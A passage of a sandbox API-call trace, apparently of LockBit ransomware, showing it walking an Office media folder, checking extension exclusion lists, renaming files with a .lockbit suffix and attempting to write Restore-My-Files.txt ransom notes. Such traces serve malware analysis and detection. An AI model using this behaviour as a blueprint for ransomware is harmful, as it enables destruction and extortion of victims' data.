(lpString1=".lock", lpString2=".GIF") returned 1 [0209.433] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.433] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.433] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.434] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.434] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.434] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.434] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.434] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.434] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.434] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.435] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15185_.GIF") returned 1 [0209.435] lstrcmpiW (lpString1="ntldr", lpString2="BD15185_.GIF") returned 1 [0209.435] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15185_.GIF") returned 1 [0209.435] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15185_.GIF") returned 1 [0209.435] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15185_.GIF") returned -1 [0209.435] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15185_.GIF") returned 1 [0209.435] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15185_.GIF") returned 1 [0209.435] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.435] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15185_.GIF") returned=".GIF" [0209.435] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.435] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.435] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.435] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.435] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.435] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.435] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.435] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.435] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.435] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.435] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.435] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.435] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.435] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.435] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.435] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.435] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.435] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.435] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.435] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.435] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.436] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.436] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.436] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.436] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.436] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.436] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.436] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.436] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15185_.GIF.lockbit") returned 76 [0209.436] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15185_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15185_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0209.437] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.437] malloc (_Size=0x40068) returned 0x1ff1e60 [0209.437] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1154) returned 1 [0209.437] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.438] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0209.438] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.438] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0209.438] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0209.480] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15185_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15185_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.480] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.480] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.482] free (_Block=0x1fa2ed8) [0209.482] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15185_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.482] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.482] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.482] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac6d4a00, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbcb414e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xac6d4a00, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0x2fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15301_.GIF", cAlternateFileName="")) returned 1 [0209.482] lstrcmpiW (lpString1=".", lpString2="BD15301_.GIF") returned -1 [0209.482] lstrcmpiW (lpString1="..", lpString2="BD15301_.GIF") returned -1 [0209.482] PathFindExtensionW (pszPath="BD15301_.GIF") returned=".GIF" [0209.482] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.482] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.482] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.482] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.482] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.482] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.483] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.483] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.483] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.483] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.483] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.483] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.483] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.483] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.483] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.483] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.483] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.483] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.483] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.483] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.483] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.483] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.483] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.483] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.483] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.483] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.483] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.483] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.483] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.483] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.483] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.483] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.483] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.484] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.484] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.484] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.484] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.484] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.484] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.484] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.484] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.484] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.484] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.484] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.484] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.484] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.484] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.484] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15301_.GIF") returned 1 [0209.484] lstrcmpiW (lpString1="ntldr", lpString2="BD15301_.GIF") returned 1 [0209.484] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15301_.GIF") returned 1 [0209.484] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15301_.GIF") returned 1 [0209.484] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15301_.GIF") returned -1 [0209.484] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15301_.GIF") returned 1 [0209.484] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15301_.GIF") returned 1 [0209.484] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.484] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15301_.GIF") returned=".GIF" [0209.484] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.484] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.484] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.484] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.484] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.484] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.484] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.484] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.484] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.484] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.484] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.484] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.485] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.485] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.485] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.485] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.485] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.485] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.485] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.485] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.485] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.485] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.485] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.485] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.485] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.485] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.485] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.485] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.485] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15301_.GIF.lockbit") returned 76 [0209.485] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15301_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15301_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0209.486] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.486] malloc (_Size=0x40068) returned 0x3df0008 [0209.486] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=766) returned 1 [0209.487] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.487] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0209.487] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.487] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0209.487] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0209.490] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15301_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15301_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.491] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.491] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.492] free (_Block=0x1fa2ed8) [0209.492] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15301_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.492] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.492] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.492] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7332a00, ftCreationTime.dwHighDateTime=0x1bd8f93, ftLastAccessTime.dwLowDateTime=0xbcb414e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7332a00, ftLastWriteTime.dwHighDateTime=0x1bd8f93, nFileSizeHigh=0x0, nFileSizeLow=0x1ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15302_.GIF", cAlternateFileName="")) returned 1 [0209.492] lstrcmpiW (lpString1=".", lpString2="BD15302_.GIF") returned -1 [0209.492] lstrcmpiW (lpString1="..", lpString2="BD15302_.GIF") returned -1 [0209.492] PathFindExtensionW (pszPath="BD15302_.GIF") returned=".GIF" [0209.492] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.493] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.493] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.493] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.493] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.493] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.493] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.493] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.493] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.493] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.493] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.493] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.493] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.493] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.493] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.493] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.493] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.493] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.493] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.493] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.493] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.493] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.493] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.493] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.493] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.493] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.493] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.493] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.493] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.493] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.494] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.494] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.494] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.494] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.494] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.494] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.494] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.494] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.494] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.494] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.494] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.494] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.494] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.494] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.494] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.494] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.494] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.494] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15302_.GIF") returned 1 [0209.494] lstrcmpiW (lpString1="ntldr", lpString2="BD15302_.GIF") returned 1 [0209.494] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15302_.GIF") returned 1 [0209.494] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15302_.GIF") returned 1 [0209.494] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15302_.GIF") returned -1 [0209.494] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15302_.GIF") returned 1 [0209.494] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15302_.GIF") returned 1 [0209.494] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.494] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15302_.GIF") returned=".GIF" [0209.494] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.494] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.494] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.495] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.495] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.495] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.495] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.495] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.495] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.495] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.495] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.495] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.495] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.495] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.495] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.495] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.495] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.495] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.495] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.495] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.495] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.495] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.495] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.495] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.495] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.495] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.495] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.495] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.495] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15302_.GIF.lockbit") returned 76 [0209.495] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15302_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15302_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0209.497] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.497] malloc (_Size=0x40068) returned 0x3d70450 [0209.497] 